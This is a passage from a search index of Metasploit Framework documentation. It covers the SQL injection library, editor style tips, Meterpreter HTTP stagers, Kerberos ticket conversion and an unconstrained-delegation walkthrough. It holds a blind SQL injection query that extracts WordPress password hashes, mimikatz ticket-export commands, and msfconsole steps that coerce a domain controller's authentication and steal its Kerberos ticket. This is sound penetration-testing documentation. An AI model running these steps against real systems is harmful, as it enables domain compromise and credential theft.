    "content": ". | Boolean Based Blind | Time Based Blind | . | &nbsp; | MySQL/MariaDB | SQLite | Postgres | . | Boolean Based Blind | X | X | X | . | Time Based Blind | X | X | X | . ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-techniques",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-techniques"
  },"800": {
    "doc": "SQL Injection",
    "title": "How to use in a module",
    "content": "You’ll need to start off by including the library. include Msf::Exploit::SQLi . Next we create our SQLi object: . sqli = create_sqli(dbms: MySQLi::Common, opts: sqli_opts) do |payload| # Here is where we write in what to do each request using #{payload} as the spot to inject end . dbms can be set to either Common if the DB isn’t know, or one of the other databases and methods if it is known ahead of time such as SQLitei::BooleanBasedBlind sqli_opts is a hash containing all of the options. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#how-to-use-in-a-module",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#how-to-use-in-a-module"
  },"801": {
    "doc": "SQL Injection",
    "title": "Notes",
    "content": "run_sql . run_sql can only return 1 column. magic_quotes bypass . CAN ONLY RETURN ONE COLUMN AT A TIME . At times, PHP will use magic_quotes to escape ' and \". This may cause problems in the SQL injection. You’ll know its a problem, because you’ll see log items like this: . [Sat Jan 02 14:11:53.103512 2021] [php7:notice] [pid 55607] [client 2.2.2.2:36475] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\\\';\\\\',ifnull(user_login,\\\\'\\\\'),ifnull(user_pass,\\\\'\\\\')) as binary) mMJZrCxQ from w' at line 1 for query SELECT * FROM wp_chopslider3 WHERE chopslider_id =938076279 OR 1=1 AND if(length(cast((select group_concat(mMJZrCxQ) from (select cast(concat_ws(\\\\';\\\\',ifnull(user_login,\\\\'\\\\'),ifnull(user_pass,\\\\'\\\\')) as binary) mMJZrCxQ from wp_users limit 1) fWLwo) as binary))&amp;amp;1&amp;lt;&amp;gt;0,sleep(1.0),0) . However, the query was similar to this: . [*] {SQLi} Executing (select group_concat(qcO) from (select cast(concat_ws(';',to_base64(ifnull(user_login,'')),to_base64(ifnull(user_pass,''))) as binary) qcO from wp_users limit 1) dTWyw) . The query was sent without the escapes, however they were added. The solution is to avoid quotes at all. To do this, we will need to use the hex encoder . if payload.include?(\"''\") payload.gsub!(\"''\", 'hex(0x00)') end . This will convert all instances of '' which were previously being escaped to \\'\\' to hex(0x00) which does not get altered. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#notes",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#notes"
  },"802": {
    "doc": "SQL Injection",
    "title": "SQL Injection",
    "content": "SQL Injection library support was added in 2020 by @red0xff during the Google Summer of Code. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html"
  },"803": {
    "doc": "Style Tips",
    "title": "Style Tips",
    "content": " ",
    "url": "/docs/development/quality/style-tips.html",
    "relUrl": "/docs/development/quality/style-tips.html"
  },"804": {
    "doc": "Style Tips",
    "title": "Editor configuration",
    "content": "Having your editor take care of formatting for you can save headaches during the acceptance process. Most Metasploit contributors use vim and/or gvim as a default text editor – if you have a configuration for some other editor, we’d love to see it! . VIM and GVIM . Adding the following settings to your .vimrc will make conforming to the CONTRIBUTING.md and msftidy.rb guidelines considerably easier. Incidentally, if you install the Janus Distribution of vim plugins, this is all done for you, and more, automatically. But, if you are a special snowflake, here’s how to limp your way to code formatting excellence. set shiftwidth=2 tabstop=2 softtabstop=2 \" textwidth affects `gq` which is handy for formatting comments set textwidth=78 \" Metasploit requires spaces instead of hard tabs set expandtab \" Highlight spaces at EOL and mixed tabs and spaces. hi BogusWhitespace ctermbg=darkgreen guibg=darkgreen match BogusWhitespace /\\s\\+$\\|^\\t\\+ \\+\\|^ \\+\\t\\+/ . If you’d rather these settings only apply to ruby files, you can use an autogroup and autocommands. if !exists(\"au_loaded\") let au_loaded = 1 augroup rb au FileType ruby set shiftwidth=2 tabstop=2 softtabstop=2 textwidth=78 au FileType ruby set expandtab au FileType ruby hi BogusWhitespace ctermbg=darkgreen guibg=darkgreen au FileType ruby match BogusWhitespace /\\s\\+$\\|^\\t\\+ \\+\\|^ \\+\\t\\+/ augroup END endif . You can also use :set list to see all whitespace as distinct characters to make it easier to see errant whitespace. Rubymine . Given the switch to using standard Ruby indentation, there is no special configuration needed for RubyMine any longer. Two-space tabs for life! . ",
    "url": "/docs/development/quality/style-tips.html#editor-configuration",
    "relUrl": "/docs/development/quality/style-tips.html#editor-configuration"
  },"805": {
    "doc": "Style Tips",
    "title": "Grammar and capitalization",
    "content": "While we understand that the world reads many, many languages, Metasploit is developed primarily in U.S English. Therefore, description grammar in modules should adhere to U.S. English conventions. Doing so not only ensures ease of use for the majority of Metasploit users, but also helps automatic (and manual) translators for other languages. Titles . Module titles should read like titles. For capitalization rules in English, see: http://owl.english.purdue.edu/owl/resource/592/01/ . The only exceptions are function names (like thisFunc()) and specific filenames (like thisfile.ocx). ",
    "url": "/docs/development/quality/style-tips.html#grammar-and-capitalization",
    "relUrl": "/docs/development/quality/style-tips.html#grammar-and-capitalization"
  },"806": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Windows HTTP APIs",
    "content": "The Windows API comes with two ways to talk via HTTP/S, they are WinInet and WinHTTP. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important. The WinInet API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly. WinInet comes with some limitations, one of which is that it’s close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a Paranoid Mode that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn’t match the one that Meterpreter is configured with, Meterpreter will shut down. WinInet doesn’t make this process possible without a lot of custom work. For applications such as this, WinHTTP is the “preferred” option as deemed by Microsoft. This API is designed to work under a service, and provides a greater number of ways to interact with communications made over HTTP/S. With this API it was trivial to implement the SHA1 hash verification and force Meterpreter to shut down when a MITM is detected. For a full comparison of the feature differences, please see this feature matrix on MSDN. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#windows-http-apis",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#windows-http-apis"
  },"807": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Meterpreter’s Implementation",
    "content": "Meterpreter now makes use of WinHTTP by default so that the new features are accommodated, but unfortuanetly this doesn’t come for free. Behind the scenes, this API does not make any use of the current user’s Internet Explorer configuration settings, where the WinInet API does. This means that if the current user has a proxy configured, extra code needs to be added to make use of the current Internet Explorer settings in WinHTTP. Meterpreter has been modified to do this, however there is still one limitation that is in place. As indicated in a blog post on MSDN: . WinHTTP strictly requires HTTP/1.1 compliance for keeping the connection alive and HTTP Keep-Alives are not supported in HTTP/1.0 protocol. HTTP Keep-Alive feature was introduced in the HTTP/1.1 protocol as per RFC 2616. The server or the proxy which expects the keep-alive should also implement the protocol correctly. WinHTTP on Windows 7, Windows 2008 R2 are strict in terms of security wrto protocol compliance. The ideal solution is to change the server/proxy to use the right protocol and be RFC compliant. What this means is that from Windows 7 and onwards, the underlying WinHTTP implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires Keep-Alive support, such as NTLM authentication, then WinHTTP will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a 407 error the client. This means that for Meterpreter to work, WinHTTP can’t be used. In order to avoid this issue, extra work has been done to force Meterpreter to fall back to WinInet when this happens. Given that WinInet doesn’t do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to WinInet if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM. 
To sum up, Meterpreter will use WinHTTP where it can. If it can’t, it’ll fall back to WinInet unless paranoid mode is enabled. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#meterpreters-implementation",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#meterpreters-implementation"
  },"808": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Metasploit HTTP and HTTPS Stagers",
    "content": "Metasploit users have long since known about the reverse_http and reverse_https stagers, and have made good use of them over time. What many don’t know is that these stagers use the WinInet API, which means that they don’t get SSL certificate validation (so no paranoid mode). To provide support for paranoid mode directly inside the stager, ultimately preventing the download of Meterpreter at all in the case of MITM, new stagers were required. reverse_winhttp and reverse_winhttps are implementations of stagers that make use of WinHTTP, and in the latter case, provides support for paranoid mode. They do, however come with the same implicit limitation as Meterpreter itself in that they may not be able to provide proxy support thanks to the strict RFC compliance described in the previous section. The big difference here is that the stager does not have a fallback implementation like Meterpreter does, as this would make the stager way too big. Therefore, if an older proxy is in place that doesn’t confirm to HTTP/1.1, the stager will fail. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#metasploit-http-and-https-stagers",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#metasploit-http-and-https-stagers"
  },"809": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Combining Stagers with Meterpreter",
    "content": "It’s important to note that the implementations of communications inside the stagers are completely separate to those inside Meterpreter. If you use windows/meterpreter/reverse_https, then the stager will use WinInet and Meterpreter will use WinHTTP. It isn’t possible to “hand over” communications from the stager to Meterpreter in this case, and it wouldn’t make sense anyway because HTTP/S is stateless. This is the most common set up because many people don’t realise that the reverse_winhttp/s payloads exist! . Prior to the WinInet fallback work, those people hitting the HTTP/1.0 proxy issue would find themselves with the following scenario: . | They would exploit a Windows 7 (or later) target in some way, whether it be via a browser exploit, or through a social engineering attack. | The payload that was executed was meterpreter/reverse_https, and so the initial connection would come via WinInet. | WinInet would successfully use the current user’s proxy configuration and the initial connection back to Metasploit would be successful. | The stager would download the second stage (metsrv), and reflectively load it so that Meterpreter could take over. | Meterpreter would attempt to connect again to Metasploit, this time using WinHTTP. | The proxy would return HTTP/1.0 responses, resulting in WinHTTP refusing to function. | The Meterpreter session would be considered “dead” by Metasploit as a result of the lack of successful communications after staging. | . Examples of these issues are this and this. If you are seeing similar issues it’s because your current Meterpreter binaries don’t have the fallback option. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#combining-stagers-with-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#combining-stagers-with-meterpreter"
  },"810": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Conclusion",
    "content": "HTTP/S communications in Windows is a hairy beast, and trying to cater for all cases proves to be quite tricky thanks to the limitations of some APIs, and the variable implementations of others. We’re still working to iron out all of issues, and so please log an issue if you stumble on an edge case that hasn’t yet been covered. Thank you for your patience! . OJ / @TheColonial . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#conclusion",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#conclusion"
  },"811": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "content": "Recent changes to HTTP and HTTPS communications in both Meterpreter and its stagers have caused new behaviours that have left some users confused. The aim of this post is to cover the changes that have been made, the rationale behind those changes, and the issues that come with them. By the end of this post, readers should have a clear understanding of the issues related to HTTP/S communications, and be able to diagnose and fix any issues that they might be having. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html"
  },"812": {
    "doc": "Converting kirbi and ccache files",
    "title": "Converting Kerberos Tickets",
    "content": "The auxiliary/admin/kerberos/ticket_converter module is used to convert from a ccache file format to the kirbi file format and vice versa. The main reason you may want to convert between these file types is for use in different tools. For example mimikatz will create tickets for you in the kirbi format but to use that in another tool like Metasploit or Impacket you need to convert it to the ccache format first. ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#converting-kerberos-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#converting-kerberos-tickets"
  },"813": {
    "doc": "Converting kirbi and ccache files",
    "title": "Acquiring tickets",
    "content": "Kerberos tickets can be acquired from multiple sources. For instance: . | Retrieved directly from the KDC with the get_ticket module | Forged using the forge_ticket module after compromising the krbtgt or a service account’s encryption keys | Extracted from memory using Meterpreter and mimikatz: | . meterpreter &amp;gt; load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## &amp;gt; http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' &amp;gt; http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter &amp;gt; kiwi_cmd \"sekurlsa::tickets /export\" Authentication Id : 0 ; 1393218 (00000000:00154242) Session : Network from 0 User Name : DC3$ Domain : DEMO Logon Server : (null) Logon Time : 1/12/2023 9:11:00 PM SID : S-1-5-18 * Username : DC3$ * Domain : DEMO.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL Target Name (--) : @ DEMO.LOCAL Client Name (01) : DC3$ ; @ DEMO.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 [...] ==================== Base64 of file : [0;154242][email protected] ==================== doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC ... etc... ==================== . Note that tools often Base64 encode the Kirbi content to display to the user. 
However the inspect_ticket module expects the input file to be in binary format. To convert base64 strings to binary files: . # Linux cat ticket.b64 | base64 -d &amp;gt; ticket.kirbi # Mac cat ticket.b64 | base64 -D &amp;gt; ticket.kirbi # Powershell [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"&amp;lt;bas64_ticket&amp;gt;\")) . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#acquiring-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#acquiring-tickets"
  },"814": {
    "doc": "Converting kirbi and ccache files",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/ticket_converter | Do: set InputPath /path/to/ccache/or/kirbi/file | Do: set OutputPath /path/to/save/your/converted/file | Do: run | You should see output similar to: [*] [2022.12.16-12:52:56] Converting from ccache to kirbi [*] [2022.12.16-12:52:56] File written to &amp;lt;OutputPath&amp;gt; [*] Auxiliary module execution completed . | Your converted ticket which will have been stored at OutputPath | Example usage in Metasploit: use windows/smb/psexec run rhost=192.168.123.13 username=Administrator domaincontrollerrhost=192.168.123.1 smb::auth=kerberos smb::rhostname=host.demo.local smbdomain=demo.local smbkrb5ccname=/path/to/ccache/ticket . | Example usage in impacket: export KRB5CCNAME=/path/to/ccache/ticket python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass . | You may use the inspect_ticket module to prints the contents of the ccache/kirbi file: use auxiliary/admin/kerberos/inspect_ticket | . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#module-usage"
  },"815": {
    "doc": "Converting kirbi and ccache files",
    "title": "Scenarios",
    "content": "You have a ccache file . If you have a ccache file, for example by forging it using the auxiliary/admin/kerberos/forge_ticket module, but need a file in the kirbi format which is commonly used by mimikatz. Set the InputPath to the location of your ccache file, specify your desired output location with OutputPath and run. Metasploit will automatically detect the file type so there’s no need to tell msfconsole whether it’s a ccache or kirbi file. Example: . msf6 auxiliary(admin/kerberos/ticket_converter) &amp;gt; run inputpath=metasploit_ticket.ccache outputpath=metasploit_ticket.kirbi [*] [2023.01.05-17:01:02] Converting from ccache to kirbi [*] [2023.01.05-17:01:02] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.kirbi [*] Auxiliary module execution completed . You have a kirbi file . The other scenario is if you have a kirbi file, for example tools such as mimikatz will give you tickets in the kirbi format, and you need a ccache for use with another tool such as Metasploit and Impacket. The steps are exactly the same for a kirbi file as they are for a ccache as Metasploit will automatically detect the input file type. Set the InputPath to the location of your ccache file, specify your desired output location with OutputPath and run. Metasploit will automatically detect the file type so there’s no need to tell msfconsole whether it’s a ccache or kirbi file. Example: . msf6 auxiliary(admin/kerberos/ticket_converter) &amp;gt; run inputpath=metasploit_ticket.kirbi outputpath=metasploit_ticket.ccache [*] [2023.01.05-17:01:39] Converting from kirbi to ccache [*] [2023.01.05-17:01:39] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.ccache [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html#scenarios"
  },"816": {
    "doc": "Converting kirbi and ccache files",
    "title": "Converting kirbi and ccache files",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/ticket_converter.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/ticket_converter.html"
  },"817": {
    "doc": "Uberhandler",
    "title": "Current Design",
    "content": "Metasploit payload modules are Ruby Modules and come in three types: . | Payload::Type::Single | Payload::Type::Stage | Payload::Type::Stager | . Payloads are created by creating an anonymous Class and including mixins for a Handler and either a single-stage payload or both a stage and stager, like so: . def build_payload(*modules) klass = Class.new(Payload) # Remove nil modules modules.compact! # Include the modules supplied to us with the mad skillz # spoonfu style klass.include(*modules.reverse) return klass end . The result is a Class for each combination of stage + stager + handler. E.g., windows/meterpreter/reverse_tcp includes Msf::Handler::ReverseTcp and the Modules defined in modules/payloads/stagers/windows/reverse_tcp and modules/payloads/stages/windows/meterpreter. As a corollary, this means that stages and stagers are intricately linked with each other and their handlers. ",
    "url": "/docs/development/propsals/uberhandler.html#current-design",
    "relUrl": "/docs/development/propsals/uberhandler.html#current-design"
  },"818": {
    "doc": "Uberhandler",
    "title": "What we need",
    "content": "For the Uberhandler to function, it needs to: . | Track how many exploits currently need its services | Be independent of the payload modules that use it | . The stagers need to: . | Communicate to the handler what kind of stage to send | . From a user’s perspective, we need some way to indicate a generic payload type along with the handler. The generic handlers were an early attempt at providing this same concept. Perhaps something like: . set PAYLOAD uber/meterpreter/reverse_tcp . ",
    "url": "/docs/development/propsals/uberhandler.html#what-we-need",
    "relUrl": "/docs/development/propsals/uberhandler.html#what-we-need"
  },"819": {
    "doc": "Uberhandler",
    "title": "Uberhandler",
    "content": " ",
    "url": "/docs/development/propsals/uberhandler.html",
    "relUrl": "/docs/development/propsals/uberhandler.html"
  },"820": {
    "doc": "Unconstrained delegation",
    "title": "Unconstrained Delegation Exploitation",
    "content": "If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then the attacker can leverage it to compromise the Active Directory domain. ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#unconstrained-delegation-exploitation",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#unconstrained-delegation-exploitation"
  },"821": {
    "doc": "Unconstrained delegation",
    "title": "Lab setup",
    "content": "For this attack to work there must be a computer account (workstation or server) in the active directory domain that has been configured for unconstrained delegation. On the domain controller: . | Open “Active Directory Users and Computers” | Navigate to the computer account, right click and select “Properties” | In the “Delegation” tab, select “Trust this computer for delegation to any service (Kerberos only)” | . On the target computer: . | Force an update of group policy by running gpupdate /force | Reboot the computer | . ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#lab-setup"
  },"822": {
    "doc": "Unconstrained delegation",
    "title": "Attack Workflow",
    "content": "This attack assumes that the attacker has: . | The IP address of the domain controller. | The active directory domain name. | A compromised domain account (no special privileges are necessary). | The ability to fully compromise a target system through some means. | (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used. Verify this using the db_status command. | . At a high-level the summary to leverage this attack chain is: . | Identify a target computer account configured with unconstrained delegation. | Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works). | Coerce authentication to the compromised target from a domain controller. | Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller’s computer account. | Use the TGT to authenticate to the domain controller as itself (the computer account). | . Target Identification . The unconstrained delegation setting is stored as a bit flag in the userAccountControl LDAP attribute. A domain account can be used with the auxiliary/gather/ldap_query module to identify computer accounts configured for unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation and should be ignored as targets. Use the ENUM_UNCONSTRAINED_DELEGATION action to enumerate targets: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(gather/ldap_query) &amp;gt; set DOMAIN msflab.local DOMAIN =&amp;gt; msflab.local msf6 auxiliary(gather/ldap_query) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(gather/ldap_query) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! 
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION ACTION => ENUM_UNCONSTRAINED_DELEGATION msf6 auxiliary(gather/ldap_query) > run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local CN=WS01 CN=Computers DC=msflab DC=local ======================================= Name Attributes ---- ---------- cn WS01 objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local samaccountname WS01$ CN=DC OU=Domain Controllers DC=msflab DC=local ============================================== Name Attributes ---- ---------- cn DC memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local samaccountname DC$ [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) > . This results in two potential targets, WS01 and DC. Next, use the ENUM_DOMAIN_CONTROLLERS action to identify the domain controllers to remove from the list of potential targets. msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS ACTION => ENUM_DOMAIN_CONTROLLERS msf6 auxiliary(gather/ldap_query) > run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local CN=DC OU=Domain Controllers DC=msflab DC=local ============================================== Name Attributes ---- ---------- distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local dnshostname DC.msflab.local name DC operatingsystem Windows Server 2019 Standard operatingsystemversion 10.0 (17763) [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) > . 
This shows that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target. Exploitation . Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The auxiliary/scanner/dcerpc/petitpotam module can be used for this purpose. Use the module, and take care to set the LISTENER option to the hostname of the compromised host. The hostname must be used and not an IP address. Set the remaining options including RHOSTS to the domain controller, and SMBUser / SMBPass to the credentials of the compromised domain account. msf6 &amp;gt; use auxiliary/scanner/dcerpc/petitpotam msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set LISTENER ws01.msflab.local LISTENER =&amp;gt; ws01.msflab.local msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set SMBUser aliddle SMBUser =&amp;gt; aliddle msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; run [+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful [*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/dcerpc/petitpotam) &amp;gt; . If the module does not indicate that the attack was successful, another tool like Coercer can be used to try additional methods. Now that the domain controller has authenticated to the target, it’s necessary to dump the Kerberos tickets from the compromised target. Use the post/windows/manage/kerberos_tickets module and the DUMP_TICKETS action to dump the TGTs from the compromised host. 
If the attack was successful, there should be at least one TGT from the domain controller’s computer account. msf6 &amp;gt; use post/windows/manage/kerberos_tickets msf6 post(windows/manage/kerberos_tickets) &amp;gt; set SESSION -1 SESSION =&amp;gt; -1 msf6 post(windows/manage/kerberos_tickets) &amp;gt; set SERVICE krbtgt/* SERVICE =&amp;gt; krbtgt/* msf6 post(windows/manage/kerberos_tickets) &amp;gt; run [*] LSA Handle: 0x000001efe1c415a0 [*] LogonSession LUID: 0x00004bc1d [*] User: MSFLAB\\DC$ [*] Session: 0 [*] AuthenticationPackage: Kerberos [*] LogonType: Network (3) [*] LogonTime: 2023-08-23 08:33:17 -0400 [*] Ticket[0] [*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: krbtgt/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 Subkey: false Ticket Length: 1006 Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) Addresses: 0 Authdatas: 0 Times: Auth time: 1969-12-31 19:00:00 -0500 Start time: 2023-08-23 08:33:17 -0400 End time: 2023-08-23 18:33:17 -0400 Renew Till: 2023-08-30 08:33:17 -0400 Ticket: Ticket Version Number: 5 Realm: MSFLAB.LOCAL Server Name: krbtgt/MSFLAB.LOCAL Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: ... [*] LogonSession LUID: 0x00001052b [*] User: Window Manager\\DWM-1 [*] Session: 1 [*] AuthenticationPackage: Negotiate [*] LogonType: Interactive (2) [*] LogonTime: 2023-08-23 08:32:38 -0400 ... omitted for brevity ... In this case, a TGT for the MSFLAB\\DC$ account was obtained through the logon session with LUID 0x00004bc1d. The ticket was stored to disk in a ccache file. The ticket can also be seen in the output of klist. 
msf6 post(windows/manage/kerberos_tickets) &amp;gt; klist Kerberos Cache ============== id host principal sname issued status path -- ---- --------- ----- ------ ------ ---- 411 192.168.159.10 [email protected] krbtgt/[email protected] 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin 407 192.168.159.10 [email protected] krbtgt/[email protected] 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin msf6 post(windows/manage/kerberos_tickets) &amp;gt; . Using The Ticket . Now that a TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby the attacker uses it to authenticate to the target. The auxiliary/gather/windows_secrets_dump module is a good one to use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain controller. ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#attack-workflow",
    "relUrl": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html#attack-workflow"
  },"823": {
    "doc": "Unconstrained delegation",
    "title": "Unconstrained delegation",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html",
